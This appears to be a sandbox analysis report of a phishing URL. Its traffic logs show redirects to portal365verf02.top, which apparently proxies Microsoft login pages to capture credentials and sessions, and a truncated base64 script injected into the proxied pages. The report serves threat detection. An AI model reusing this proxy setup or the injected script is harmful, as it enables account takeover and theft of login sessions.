2025-01-15 19:06:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:14 UTC	1018	OUT	GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3BvcnRhbDM2NXZlcmYwMi50b3AvIiwiZG9tYWluIjoicG9ydGFsMzY1dmVyZjAyLnRvcCIsImtleSI6IlFoWHFXUmFMZENvSiIsInFyYyI6InRlc3RAdGVzdC5vcmciLCJpYXQiOjE3MzY5Njc5NzMsImV4cCI6MTczNjk2ODA5M30.YFx4H1uKgJMzg3QIJ3_BfumkI9UX5LynRfp4R_DmUTY HTTP/1.1 Host: portal365verf02.top Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:06:15 UTC	302	IN	HTTP/1.1 302 Found Set-Cookie: qPdM=QhXqWRaLdCoJ; path=/; samesite=none; secure; httponly Set-Cookie: qPdM.sig=2wRe3PLXmOt5cQBI4VBvailOcWU; path=/; samesite=none; secure; httponly location: /?qrc=test%40test.org Date: Wed, 15 Jan 2025 19:06:14 GMT Connection: close Transfer-Encoding: chunked
2025-01-15 19:06:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Cryptography

Phishing

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Chrome Cache Entry: 81

Chrome Cache Entry: 82

Chrome Cache Entry: 83

Chrome Cache Entry: 84

Chrome Cache Entry: 85

Chrome Cache Entry: 86

Chrome Cache Entry: 87

Chrome Cache Entry: 88

Windows Analysis Report
https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:15 UTC	818	OUT	GET /?qrc=test%40test.org HTTP/1.1 Host: portal365verf02.top Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=QhXqWRaLdCoJ; qPdM.sig=2wRe3PLXmOt5cQBI4VBvailOcWU
2025-01-15 19:06:15 UTC	1244	IN	HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache Pragma: no-cache Location: https://portal365verf02.top/owa/?login_hint=test%40test.org Server: Microsoft-IIS/10.0 request-id: d815319a-cc12-3132-b87d-0d188f2a7e2b Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-FEServer: AS4P189CA0043, AS4P189CA0043 X-RequestId: 14ad35c4-5246-4c20-bb64-fc0a86ed53e1 Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000 X-FEProxyInfo: AS4P189CA0043.EURP189.PROD.OUTLOOK.COM X-FEEFZInfo: AMS MS-CV: mjEV2BLMMjG4fQ0Yjyp+Kw.0 X-Powered-By: ASP.NET Date: Wed, 15 Jan 2025 19:06:15 GMT Connection: close Content-Length: 0 Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:15 UTC	829	OUT	GET /owa/?login_hint=test%40test.org HTTP/1.1 Host: portal365verf02.top Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=QhXqWRaLdCoJ; qPdM.sig=2wRe3PLXmOt5cQBI4VBvailOcWU
2025-01-15 19:06:16 UTC	8030	IN	HTTP/1.1 302 Found content-length: 1355 Content-Type: text/html; charset=utf-8 Location: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10ZXN0JTQwdGVzdC5vcmcmY2xpZW50LXJlcXVlc3QtaWQ9YzlkOGFkZmItNDk4Yi05YzcwLWVjNGItMjUyODRlZGVlNjkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNTY0Nzc2MTMwODIyNy4yYTNjNmJhMC0xZmM0LTQ5OTQtOTBjMC01NDNlZjA1Y2I5ZTUmc3RhdGU9Rll0TENvQWdGQUMxTHRLbXBmWFNweThYMFZIQ3hENFFDaVYwX1d3eE02dmhqTEc2VUJVNEZERXlhaVNwRFJLWlFjRW9KWFhTS1c5V0IyTFlQQXEwRm9VRkQwS2pDaHRvdjlxZ2VYbWJQcjJ1bjYtMG4zRTV6cGluSEo3Y0l2enAwcjFf Server: Microsoft-IIS/10.0 request-id: c9d8adfb-498b-9c70-ec4b-25284edee691 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-CalculatedFETarget: VI1PR04CU006.internal.outlook.com X-BackEndHttpStatus: 302, 302 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ClientId=B36E874E085E45BDA840ECB68DEA73E1; expires=Thu, 15-Jan-2026 19:06:16 GMT; path=/;SameSite=None; secure Set-Cookie: ClientId=B36E874E085E45BDA840ECB68DEA73E1; expires=Thu, 15-Jan-2026 19:06:16 GMT; path=/;SameSite=None; secure Set-Cookie: OIDC=1; expires=Tue, 15-Jul-2025 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: RoutingKeyCookie=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v1=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v1=; domain=portal365verf02.top; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.id_token.v1=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.code.v1=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.id_token.v1=; domain=portal365verf02.top; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.code.v1=; domain=portal365verf02.top; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=portal365verf02.top; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=portal365verf02.top; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.tokenPostPath=; domain=portal365verf02.top; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.nonce.v3.yM_C4uEFBsmjVgR5nmH6J9WRuWSRb_jSHnByoTdpqUU=638725647761308227.2a3c6ba0-1fc4-4994-90c0-543ef05cb9e5; expires=Wed, 15-Jan-2025 20:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: HostSwitchPrg=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OptInPrg=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: SuiteServiceProxyKey=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: ClientId=B36E874E085E45BDA840ECB68DEA73E1; expires=Thu, 15-Jan-2026 19:06:16 GMT; path=/;SameSite=None; secure Set-Cookie: OIDC=1; expires=Tue, 15-Jul-2025 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: RoutingKeyCookie=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v1=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v1=; domain=portal365verf02.top; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.id_token.v1=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.code.v1=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.id_token.v1=; domain=portal365verf02.top; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.code.v1=; domain=portal365verf02.top; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=portal365verf02.top; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=portal365verf02.top; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.tokenPostPath=; domain=portal365verf02.top; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.nonce.v3.yM_C4uEFBsmjVgR5nmH6J9WRuWSRb_jSHnByoTdpqUU=638725647761308227.2a3c6ba0-1fc4-4994-90c0-543ef05cb9e5; expires=Wed, 15-Jan-2025 20:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: HostSwitchPrg=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OptInPrg=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: SuiteServiceProxyKey=; expires=Sun, 15-Jan-1995 19:06:16 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: X-OWA-RedirectHistory=ArLym14BQ3q-r5c13Qg; expires=Thu, 16-Jan-2025 01:08:16 GMT; path=/;SameSite=None; secure; HttpOnly X-CalculatedBETarget: VI1PR10MB7830.EURPRD10.PROD.OUTLOOK.COM X-RUM-Validated: 1 X-RUM-NotUpdateQueriedPath: 1 X-RUM-NotUpdateQueriedDbCopy: 1 X-BeSku: WCS7 X-OWA-DiagnosticsInfo: 8;0;0; X-BackEnd-Begin: 2025-01-15T19:06:16.130 X-BackEnd-End: 2025-01-15T19:06:16.130 X-DiagInfo: VI1PR10MB7830 X-BEServer: VI1PR10MB7830 X-UA-Compatible: IE=EmulateIE7 X-ResponseOrigin: OwaAppPool X-Proxy-RoutingCorrectness: 1 X-Proxy-BackendServerStatus: 302 X-FEProxyInfo: AM0PR10CA0080.EURPRD10.PROD.OUTLOOK.COM X-FEEFZInfo: AMS X-FEServer: VI1PR04CA0087, AM0PR10CA0080 NEL: {"report_to":"NelOfficeUpload1","max_age":7200,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01} Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000 X-FirstHopCafeEFZ: AMS Date: Wed, 15 Jan 2025 19:06:16 GMT Connection: close Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2025-01-15 19:06:16 UTC	1355	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32 4e 31 62 57 56 75 64 43 35 6f 5a 57 46 6b 4c 6d 46 77 63 47 56 75 5a 45 4e 6f 61 57 78 6b 4b 45 39 69 61 6d 56 6a 64 43 35 68 63 33 4e 70 5a 32 34 6f 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 33 4a 6c 59 58 52 6c 52 57 78 6c 62 57 56 75 64 43 67 69 5a 47 6c 32 49 69 6b 73 65 Data Ascii: <html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:16 UTC	1935	OUT	GET /?63iyxz80f=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10ZXN0JTQwdGVzdC5vcmcmY2xpZW50LXJlcXVlc3QtaWQ9YzlkOGFkZmItNDk4Yi05YzcwLWVjNGItMjUyODRlZGVlNjkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNTY0Nzc2MTMwODIyNy4yYTNjNmJhMC0xZmM0LTQ5OTQtOTBjMC01NDNlZjA1Y2I5ZTUmc3RhdGU9Rll0TENvQWdGQUMxTHRLbXBmWFNweThYMFZIQ3hENFFDaVYwX1d3eE02dmhqTEc2VUJVNEZERXlhaVNwRFJLWlFjRW9KWFhTS1c5V0IyTFlQQXEwRm9VRkQwS2pDaHRvdjlxZ2VYbWJQcjJ1bjYtMG4zRTV6cGluSEo3Y0l2enAwcjFf HTTP/1.1 Host: portal365verf02.top Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=ftYHT3GSqGuC; qPdM.sig=hUikkNDtV-aWkZ3wtnpzF5nh2Cs; ClientId=B36E874E085E45BDA840ECB68DEA73E1; OIDC=1; OpenIdConnect.nonce.v3.yM_C4uEFBsmjVgR5nmH6J9WRuWSRb_jSHnByoTdpqUU=638725647761308227.2a3c6ba0-1fc4-4994-90c0-543ef05cb9e5; X-OWA-RedirectHistory=ArLym14BQ3q-r5c13Qg
2025-01-15 19:06:17 UTC	2586	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Strict-Transport-Security: max-age=31536000; includeSubDomains P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: 38f1a944-1145-4539-82af-bd28a0700c00 x-ms-ests-server: 2.1.19870.3 - NEULR1 ProdSlices nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-CSJtgS2zRNWDFYnMzNhSCQ' 'unsafe-inline' 'unsafe-eval' https://.msauth.net https://.msftauth.net https://.msftauthimages.net https://.msauthimages.net https://.msidentity.com https://.microsoftonline-p.com https://.microsoftazuread-sso.com https://.azureedge.net https://.outlook.com https://.office.com https://.office365.com https://.microsoft.com https://.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All Set-Cookie: esctx-OFqAPL29z84=AQABCQEAAABVrSpeuWamRam2jAF1XRQE5h82xGeHckVGKkySRRogG7y3RcgP1NzaLAv6MVqqQHILtlUZgZuqhjw4blCcVmARyZfPjwA9uhvyHRkcqFkAm5Amyy2NjQ6W3zhBiPvKFVbWrPuNv8lXuw-ERP6zvoOMYeFAtLuwwo2pUBgn5KL40SAA; domain=portal365verf02.top; path=/; secure; HttpOnly; SameSite=None Set-Cookie: fpc=AjvhwliVw9dNlIW6imzLc3s; expires=Fri, 14-Feb-2025 19:06:17 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEOkhehSc-09HLhxSuCxZ96KBemtrxznJFXB5yGpKeiSYX1utvWatE-rPaDWkBB1Qp1qddzOAP5W4RLWXf4xiXZNLtUptmX8o-SfbjLUcnXnmg4-IVw6JuPKmnRUlgFFmTCaTmu41lpRXjXe6cYSvEMvEo9sJyZYTQWH3FXFqvZd0gAA; domain=portal365verf02.top; path=/; secure; HttpOnly; SameSite=None Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Set-Cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly Date: Wed, 15 Jan 2025 19:06:16 GMT Connection: close content-length: 21947 Content-Security-Policy: default-src data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2025-01-15 19:06:17 UTC	13798	IN	Data Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32 Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2
2025-01-15 19:06:17 UTC	8149	IN	Data Raw: 6e 63 74 69 6f 6e 28 29 7b 76 28 65 2c 6f 2c 69 2c 73 29 7d 2c 35 30 30 29 3a 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 73 2e 72 65 61 64 79 53 74 61 74 65 26 26 76 28 65 2c 6f 2c 69 2c 73 29 7d 2c 74 28 73 29 2c 72 28 22 5b 24 4c 6f 61 64 65 72 5d 3a 20 4c 6f 61 64 69 6e 67 20 27 22 2b 28 61 2e 73 72 63 50 61 74 68 7c 7c 22 22 29 2b 22 27 2c 20 69 64 3a 22 2b 28 61 2e 69 64 7c 7c 22 22 29 29 7d 65 6c 73 65 7b 6f 26 26 6f 28 29 7d 7d 76 61 72 20 70 3d 65 28 29 2c 79 3d 70 2e 73 6c 4d 61 78 52 65 74 72 79 7c 7c 32 2c 6d 3d 70 2e 6c 6f 61 64 65 72 7c 7c 7b 7d 2c 62 3d 6d 2e 63 64 6e 52 6f 6f 74 73 7c 7c 5b 5d 2c 45 3d 6d 2e 74 65 6e 61 6e 74 42 72 61 6e 64 69 6e 67 43 64 6e 52 6f 6f 74 73 7c 7c 5b 5d 2c 4c 3d 74 68 69 73 2c 77 3d 5b 5d 3b 4c 2e 72 65 74 72 79 Data Ascii: nction(){v(e,o,i,s)},500):"complete"===s.readyState&&v(e,o,i,s)},t(s),r("[$Loader]: Loading '"+(a.srcPath\|\|"")+"', id:"+(a.id\|\|""))}else{o&&o()}}var p=e(),y=p.slMaxRetry\|\|2,m=p.loader\|\|{},b=m.cdnRoots\|\|[],E=m.tenantBrandingCdnRoots\|\|[],L=this,w=[];L.retry

Timestamp	Bytes transferred	Direction	Data
